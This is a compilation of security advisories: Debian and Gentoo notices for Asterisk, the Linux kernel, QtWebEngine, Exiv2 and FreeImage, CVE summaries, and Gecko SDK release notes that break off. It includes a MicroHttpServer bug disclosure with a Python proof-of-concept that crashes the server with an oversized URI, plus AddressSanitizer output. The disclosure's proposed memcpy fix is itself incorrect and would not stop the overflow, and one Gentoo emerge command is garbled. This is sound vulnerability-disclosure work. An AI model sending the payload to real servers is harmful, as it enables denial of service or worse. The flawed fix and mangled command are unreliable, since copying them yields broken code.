Debian Linux Security Advisory 5596-1 - Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5596-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
January 04, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : asterisk  
CVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786  
Debian Bug     : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open  
Source Private Branch Exchange.

CVE-2023-37457

    The 'update' functionality of the PJSIP_HEADER dialplan function can exceed  
    the available buffer space for storing the new value of a header. By doing  
    so this can overwrite memory or cause a crash. This is not externally  
    exploitable, unless dialplan is explicitly written to update a header based  
    on data from an outside source. If the 'update' functionality is not used  
    the vulnerability does not occur.

CVE-2023-38703

    PJSIP is a free and open source multimedia communication library written in  
    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a  
    higher level media transport which is stacked upon a lower level media  
    transport such as UDP and ICE. Currently a higher level transport is not  
    synchronized with its lower level transport that may introduce a  
    use-after-free issue. This vulnerability affects applications that have  
    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media  
    transport other than UDP. This vulnerability’s impact may range from  
    unexpected application termination to control flow hijack/memory  
    corruption.

CVE-2023-49294

    It is possible to read any arbitrary file even when the `live_dangerously`  
    option is not enabled.

CVE-2023-49786

   Asterisk is susceptible to a DoS due to a race condition in the hello  
   handshake phase of the DTLS protocol when handling DTLS-SRTP for media  
   setup. This attack can be done continuously, thus denying new DTLS-SRTP  
   encrypted calls during the attack. Abuse of this vulnerability may lead to  
   a massive Denial of Service on vulnerable Asterisk servers for calls that  
   rely on DTLS-SRTP.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F  
Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl  
AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b  
zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk  
T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb  
bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu  
mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh  
bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ  
Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+  
sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU  
+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A  
-----END PGP SIGNATURE-----

Debian Security Advisory 5596-1

Debian Linux Security Advisory 5593-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5593-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
January 01, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-6531 CVE-2023-6622 CVE-2023-6817 CVE-2023-6931  
                 CVE-2023-51779 CVE-2023-51780 CVE-2023-51781 CVE-2023-51782

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-6531

    Jann Horn discovered a use-after-free flaw due to a race condition  
    problem when the unix garbage collector's deletion of a SKB races  
    with unix_stream_read_generic() on the socket that the SKB is  
    queued on.

CVE-2023-6622

    Xingyuan Mo discovered a flaw in the netfilter subsystem which may  
    result in denial of service or privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6817

    Xingyuan Mo discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-6931

    Budimir Markovic reported a heap out-of-bounds write vulnerability  
    in the Linux kernel's Performance Events system which may result in  
    denial of service or privilege escalation.

CVE-2023-51779

    It was discovered that a race condition in the Bluetooth subsystem  
    in the bt_sock_ioctl handling may lead to a use-after-free.

CVE-2023-51780

    It was discovered that a race condition in the ATM (Asynchronous  
    Transfer Mode) subsystem may lead to a use-after-free.

CVE-2023-51781

    It was discovered that a race condition in the Appletalk subsystem  
    may lead to a use-after-free.

CVE-2023-51782

    It was discovered that a race condition in the Amateur Radio X.25  
    PLP (Rose) support may lead to a use-after-free.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.69-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWSuDJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q7/g//Ski3EY0dL0SNhIWCSVOA01f4rZbW8e+65GpQofJtckBb2Wk1ZyMb+eLv  
U5aRfscn7DC2J0BiX+/JjaboTx880WcUQw5csbSzb2bEGhsHBwHkCG31qaTs5ekG  
XH654gBja/FmGZOvQ+YwoglDMCbCiSrUs7fwe3kPhlr3XRHs2ZdezKrOQ3m2bo7g  
xnA7UwB+5xwbbnweYkmKxtowM+x4XUDsr43/YR+mbeULzprGQGbyxsi8txKJQ8d+  
xqyxCl5zki3dF/baBhBLPMH26GUs6fGsplhht9ecUcKXiNeyYLBX6Aepb4YDEgKN  
o0tBDPVundFPxyQzr8qMfdB0w6+4U2z+QavV/OCziNIKXbnrNUMpjF6Pks+geneY  
R+ut1KWHVkOJsAgI3mGrLd+tjPSEsdUB2EJhlFWpF9XJnBD3KV9xPVOBN3ZjL1+o  
t/ow/5XV+LZTihUQ37stcJRnl5U1CGWlBWbUonc++eGbCAvFNaV6gTfADWyz+/6W  
z5eKFZpj678AFr5RbkgF2earJUT0iC3vgtKMTiEsxNoRMZgVOu8iiekX+gpWBkdt  
2w+dAAu8VFixQ5/Sl8LDYCFkP8xrtf31XiNBsrMZzxJDfMtNYMi++iQXSW8LyoL/  
JqbEQibQU57ls29SbvoweKCnK1GgBfhrqqGAk7/Pnax0yuK4z4M=9GI7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5593-1

Gentoo Linux Security Advisory 202312-7 - Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. Versions greater than or equal to 5.15.11_p20231120 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: QtWebEngine: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #913050, #915465  
       ID: 202312-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilitiies have been discovered in QtWebEngine, the worst  
of which could lead to remote code execution.

Background  
=========  
QtWebEngine is a library for rendering dynamic web content in Qt5 and  
Qt6 C++ and QML applications.

Affected packages  
================  
Package             Vulnerable           Unaffected  
------------------  -------------------  --------------------  
dev-qt/qtwebengine  < 5.15.11_p20231120  >= 5.15.11_p20231120

Description  
==========  
Multiple vulnerabilities have been discovered in QtWebEngine. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All QtWebEngine users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-qt/qtwebengine-5.15.11_p20231120"

References  
=========  
[ 1 ] CVE-2023-4068  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4068  
[ 2 ] CVE-2023-4069  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4069  
[ 3 ] CVE-2023-4070  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4070  
[ 4 ] CVE-2023-4071  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4071  
[ 5 ] CVE-2023-4072  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4072  
[ 6 ] CVE-2023-4073  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4073  
[ 7 ] CVE-2023-4074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4074  
[ 8 ] CVE-2023-4075  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4075  
[ 9 ] CVE-2023-4076  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4076  
[ 10 ] CVE-2023-4077  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4077  
[ 11 ] CVE-2023-4078  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4078  
[ 12 ] CVE-2023-4761  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4761  
[ 13 ] CVE-2023-4762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4762  
[ 14 ] CVE-2023-4763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4763  
[ 15 ] CVE-2023-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4764  
[ 16 ] CVE-2023-5218  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5218  
[ 17 ] CVE-2023-5473  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5473  
[ 18 ] CVE-2023-5474  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5474  
[ 19 ] CVE-2023-5475  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5475  
[ 20 ] CVE-2023-5476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5476  
[ 21 ] CVE-2023-5477  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5477  
[ 22 ] CVE-2023-5478  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5478  
[ 23 ] CVE-2023-5479  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5479  
[ 24 ] CVE-2023-5480  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5480  
[ 25 ] CVE-2023-5481  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5481  
[ 26 ] CVE-2023-5482  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5482  
[ 27 ] CVE-2023-5483  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5483  
[ 28 ] CVE-2023-5484  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5484  
[ 29 ] CVE-2023-5485  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5485  
[ 30 ] CVE-2023-5486  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5486  
[ 31 ] CVE-2023-5487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5487  
[ 32 ] CVE-2023-5849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5849  
[ 33 ] CVE-2023-5850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5850  
[ 34 ] CVE-2023-5851  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5851  
[ 35 ] CVE-2023-5852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5852  
[ 36 ] CVE-2023-5853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5853  
[ 37 ] CVE-2023-5854  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5854  
[ 38 ] CVE-2023-5855  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5855  
[ 39 ] CVE-2023-5856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5856  
[ 40 ] CVE-2023-5857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5857  
[ 41 ] CVE-2023-5858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5858  
[ 42 ] CVE-2023-5859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5859  
[ 43 ] CVE-2023-5996  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5996  
[ 44 ] CVE-2023-5997  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5997  
[ 45 ] CVE-2023-6112  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6112

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-07

Gentoo Linux Security Advisory 202312-6 - Multiple vulnerabilities have been discovered in Exiv2, the worst of which can lead to remote code execution. Versions greater than or equal to 0.28.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Exiv2: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #785646, #807346, #917650  
       ID: 202312-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Exiv2, the worst of  
which can lead to remote code execution.

Background  
=========  
Exiv2 is a C++ library and set of tools for parsing, editing and saving  
Exif and IPTC metadata from images. Exif, the Exchangeable image file  
format, specifies the addition of metadata tags to JPEG, TIFF and RIFF  
files.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
media-gfx/exiv2  < 0.28.1      >= 0.28.1

Description  
==========  
Multiple vulnerabilities have been discovered in Exiv2. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Exiv2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/exiv2-0.28.1"

References  
=========  
[ 1 ] CVE-2020-18771  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18771  
[ 2 ] CVE-2020-18773  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18773  
[ 3 ] CVE-2020-18774  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18774  
[ 4 ] CVE-2020-18899  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18899  
[ 5 ] CVE-2021-29457  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29457  
[ 6 ] CVE-2021-29458  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29458  
[ 7 ] CVE-2021-29463  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29463  
[ 8 ] CVE-2021-29464  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29464  
[ 9 ] CVE-2021-29470  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29470  
[ 10 ] CVE-2021-29473  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29473  
[ 11 ] CVE-2021-29623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29623  
[ 12 ] CVE-2021-31291  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31291  
[ 13 ] CVE-2021-31292  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31292  
[ 14 ] CVE-2021-32617  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32617  
[ 15 ] CVE-2021-32815  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32815  
[ 16 ] CVE-2021-34334  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34334  
[ 17 ] CVE-2021-34335  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34335  
[ 18 ] CVE-2021-37615  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37615  
[ 19 ] CVE-2021-37616  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37616  
[ 20 ] CVE-2021-37618  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37618  
[ 21 ] CVE-2021-37619  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37619  
[ 22 ] CVE-2021-37620  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37620  
[ 23 ] CVE-2021-37621  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37621  
[ 24 ] CVE-2021-37622  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37622  
[ 25 ] CVE-2021-37623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37623  
[ 26 ] CVE-2023-44398  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44398

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-06

Debian Linux Security Advisory 5579-1 - Multiple vulnerabilities were discovered in FreeImage, a support library for graphics image formats, which could result in the execution of arbitrary code if malformed image files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5579-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 17, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : freeimageCVE ID         : CVE-2020-21427 CVE-2020-21428 CVE-2020-22524Multiple vulnerabilities were discovered in FreeImage, a support libraryfor graphics image formats, which could result in the execution ofarbitrary code if malformed image files are processed.For the oldstable distribution (bullseye), these problems have been fixedin version 3.18.0+ds2-6+deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 3.18.0+ds2-9+deb12u1.We recommend that you upgrade your freeimage packages.For the detailed security status of freeimage please refer toits security tracker page at:https://security-tracker.debian.org/tracker/freeimageFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmV/P8AACgkQEMKTtsN8TjZOgw//e8Bv/IaGizwfZv1pgt7WltqB7B/CcwaP4S1ARybOAEShsVvMUojq3oocT8xG37LWJ6POh1w9Ks8mEtmhAcyap0L7oO+xUyBsvIy1Wqa+XK26AVeAtbSNyyr8jIzfD/5B0cT8mhs7d3t1EhuLucB5n3VL2KWU3INRuo0Az7rBxrQO5lzT46dBJueJDX4f5jIEVEbxvLCkox/COz0eQW2S0m+ry6qKnVf8F7lBBMEZQVzQrHI3sV5Eo9vKPGIBlQmf05qm04utwbOxKWCU3Aq+3aVt+5DJ62oGPBS/aLjsi3pN2wSay3kE/xV/CUyV4N5R9NYPFqyPBC8gPgwDg1gOvIEFP1nXKpxWK+JtLRpZDg4Gl5Wmo9aE9Qinw7ajxY/MbtL+U0QsfqL2TKnZs0yVineV6aUffSZ6r64BK2FEVN5ZoRM4G59++8iE45xX2QxM8DklmYc3Utyo2nmmckJNfwRnevTxesDHjxSUPMQe/gGtpFSiXmHK6LoQFxcv5+p8LS6JcRQINNXtcyHnRJt2jFsOKWZ5C84iNSy9tN+wtvR4dIOOSuGcxkmyDeIjFOMKXeYxqfqurWC0ipXJ39agh0Co4kqUXtPClpGg++/zVKZ3fNW6sQ/NVYKmEj2YPY/39EWV894huQiXRkzpykOWIa/54Knpxz60FBID3s/7gU4==zfhY-----END PGP SIGNATURE-----

Debian Security Advisory 5579-1

In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI.

Hi

After executing my fuzz tests, I discovered a remote stack buffer overflow in the C version of MicroHttpServer in the function uint8\_t \_ReadStaticFiles(HTTPReqMessage \*req, HTTPResMessage \*res) at lib/middleware.c, line 67:

memcpy(path + strlen(STATIC\_FILE\_FOLDER), uri, strlen(uri));

Any server or embedded application that utilizes MicroHttpServer is potentially at risk of remote code execution. I've included reproduction steps in the following sections.

**Makefile Modifications**

The following modifications were made to the Makefile to compile the server with address sanitizer and debug symbols. The purpose of this is to track and verify the location of the stack buffer overflow:

    PROJ=microhttpserver
    
    CC=gcc
    INCLUDES=-Ilib
    DEFS=-D_PARSE_SIGNAL_ -D_PARSE_SIGNAL_INT_ -DDEBUG_MSG -DENABLE_STATIC_FILE=1
    CFLAGS=-Os -Wall -fsanitize=address -g
    SRCS=main.c app.c lib/server.c lib/middleware.c
    
    all:
    	$(CC) $(SRCS) $(INCLUDES) $(DEFS) $(CFLAGS) -o $(PROJ)
    
    clean:
    	rm -rf *.out *.bin *.exe *.o *.a *.so *.list *.img test build $(PROJ)
    

**Proof of Concept Python3 Script**

Save the following script to a file named poc.py:

    #!/usr/bin/env python3
    
    import socket
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("localhost", 8001))
    sock.send(b"GET /"+b"%s"*5000+b" HTTP/1.1\r\nHost:localhost:8001\r\n\r\n")
    response = sock.recv(4096)
    sock.close()
    

**Starting MicroHttpServer****Execute our Python3 Script****Address Sanitizer Output**

The following output is produced by address sanitizer, confirming the existence of the stack buffer overflow:

    Listening
    Accept 1 client.  127.0.0.1:35914
            Parse Header
            Parse body
    =================================================================
    ==268450==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc75d79c90 at pc 0x7f141a66dcbf bp 0x7ffc75d79b50 sp 0x7ffc75d79310
    WRITE of size 10001 at 0x7ffc75d79c90 thread T0
        #0 0x7f141a66dcbe in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:899
        #1 0x5632c9deeb74 in _ReadStaticFiles lib/middleware.c:67
        #2 0x5632c9deef9b in Dispatch lib/middleware.c:138
        #3 0x5632c9dee12b in _HTTPServerRequest lib/server.c:316
        #4 0x5632c9dee12b in _HTTPServerRequest lib/server.c:308
        #5 0x5632c9dee4e8 in HTTPServerRun lib/server.c:350
        #6 0x5632c9dec3c9 in main /home/kali/projects/fuzzing/MicroHttpServer/c-version/main.c:27
        #7 0x7f141a4456c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #8 0x7f141a445784 in __libc_start_main_impl ../csu/libc-start.c:360
        #9 0x5632c9dec460 in _start (/home/kali/projects/fuzzing/MicroHttpServer/c-version/microhttpserver+0x2460) (BuildId: 39e1eff8cc6e7225cc4b4972fb5564788133b49d)
    
    Address 0x7ffc75d79c90 is located in stack of thread T0 at offset 288 in frame
        #0 0x5632c9dee8a3 in _ReadStaticFiles lib/middleware.c:36
    
      This frame has 2 object(s):
        [48, 127) 'header' (line 47)
        [160, 288) 'path' (line 45) <== Memory access at offset 288 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:899 in __interceptor_memcpy
    Shadow bytes around the buggy address:
      0x7ffc75d79a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ffc75d79a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ffc75d79b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
      0x7ffc75d79b80: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 07 f2 f2
      0x7ffc75d79c00: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x7ffc75d79c80: 00 00[f3]f3 f3 f3 00 00 00 00 00 00 00 00 00 00
      0x7ffc75d79d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x7ffc75d79d80: 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 00 00
      0x7ffc75d79e00: 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00
      0x7ffc75d79e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 f3
      0x7ffc75d79f00: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==268450==ABORTING
    
    

**Impact**

*   Remote Code Execution
*   Denial of Service

**Mitigation**

The issue here is that memcpy is copying the value of 'uri' to 'path+srlen(STATIC\_FILE\_FOLDER)', but the size of the uri is larger than the destination buffer.

Buffer overflow vulnerability:

    memcpy(path + strlen(STATIC_FILE_FOLDER), uri, strlen(uri));
    

This can be modified to prevent a buffer overflow:

    memcpy(path + strlen(STATIC_FILE_FOLDER), uri, strlen(path) + strlen(STATIC_FILE_FOLDER));
    

**References**

*   Buffer Overflow (CWE-121)
*   OWASP Buffer Overflow Vulnerabilities
*   Address Sanitizer

CVE-2023-50965: Remote Buffer Overflow at lib/middleware.c · Issue #5 · starnight/MicroHttpServer

A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms.

CVE-2023-50784: UnrealIRCd - The most widely deployed IRC server


A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device.



**v4.4.0**

**Gecko SDK (GSDK) Version 4.4.0.0**

Component

Version

Summary

Details

32-Bit MCU SDK

6.6.0.0

\- Added support for new OPNs  
\- Upgrade compilers to GCC 12.2.1 and IAR 9.40.1

Release Notes

Bluetooth SDK

7.0.0.0

**Bluetooth**  
\- Bluetooth Connection Analyzer can retrieve detailed connection parameters of a local connection and allows non-connected devices to track the RSSI of the connected devices  
**Multiprotocol**  
\- Concurrent Listening support (RCP) – MG21 and MG24  
\- Concurrent Multiprotocol (CMP) Zigbee NCP + OpenThread RCP – production  
\- Dynamic Multiprotocol Bluetooth + Concurrent Multiprotocol (CMP) Zigbee and OpenThread support on SoC

Release Notes

Bluetooth Location Services

7.0.0.0

\- Underlying code changes only

Release Notes

Bluetooth Mesh SDK

6.0.0.0

\- Qualified implementation of Bluetooth Mesh 1.1  
\- Added Network Lighting Control (NLC) profiles

Release Notes

Gecko Platform

4.4.0.0

**Peripherals**  
\- New API names introduced for low-level drivers (with compatibility layer for old names)  
**Services**  
\- APIs for accessing value of tokens added to Token Manager  
**CPC**  
\- NVM3 module, enabling Host access to Secondary device's non-volatile memory, released at production quality  
\- CPC Primary, for use with MCU Hosts, released at Experimental quality  
\- Numerous optimizations and performance improvements made  
**Security**  
\- Mbed TLS upgraded (to version 3.5.0)  
**RAIL**  
\- Several new features added for EFR32xG25 devices, including a new component for selecting modulations supported by the software modem  
\- Support added for several new PHYs, including Sidewalk PHYs on EFR32xG23 and EFR32xG28  
**Other components**  
\- Compilers upgraded (to GCC 12.2.1 and IAR 9.40.1)

Release Notes

OpenThread SDK

2.4.0.0

**Thread**  
